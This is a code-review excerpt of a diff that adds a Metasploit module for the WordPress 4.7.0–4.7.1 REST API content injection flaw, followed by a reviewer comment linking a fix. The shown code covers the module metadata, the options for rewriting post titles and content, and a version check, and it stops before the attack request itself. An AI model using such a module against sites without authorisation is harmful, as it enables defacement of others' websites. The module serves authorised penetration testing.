modules/auxiliary/scanner/http/wp_content_injection.rb

```diff
@@ -0,0 +1,168 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress REST API Content Injection',
+      'Description'    => %q{
+        This module exploits a content injection vulnerability in WordPress
+        versions 4.7.0 through 4.7.1 via type juggling in the REST API.
+      },
+      'Author'         => 'wvu',
+      'References'     => [
+        ['URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'],
+        ['URL', 'https://developer.wordpress.org/rest-api/reference/posts/'],
+        ['URL', 'https://secure.php.net/manual/en/language.types.type-juggling.php']
+      ],
+      'DisclosureDate' => 'Feb 1 2017',
+      'License'        => MSF_LICENSE,
+      'Actions'        => [
+        ['LIST',   'Description' => 'List posts'],
+        ['UPDATE', 'Description' => 'Update post']
+      ],
+      'DefaultAction'  => 'LIST'
+    ))
+
+    register_options([
+      OptInt.new('POST_ID',         [false, 'Post ID (0 for all)', 0]),
+      OptString.new('POST_TITLE',   [false, 'Post title']),
+      OptString.new('POST_CONTENT', [false, 'Post content'])
+    ])
+  end
+
+  def check_host(ip)
+    version = wordpress_version
+
+    if version
+      version = Gem::Version.new(version)
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version} detected at #{full_uri}")
+
+    if version.between?(Gem::Version.new('4.7.0'), Gem::Version.new('4.7.1'))
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def run_host(ip)
```

Comment:
Fixed in https://github.com/rapid7/metasploit-framework/pull/7905/commits/beacbf495d581b0efbf1ae7af34d8722b30d1cda.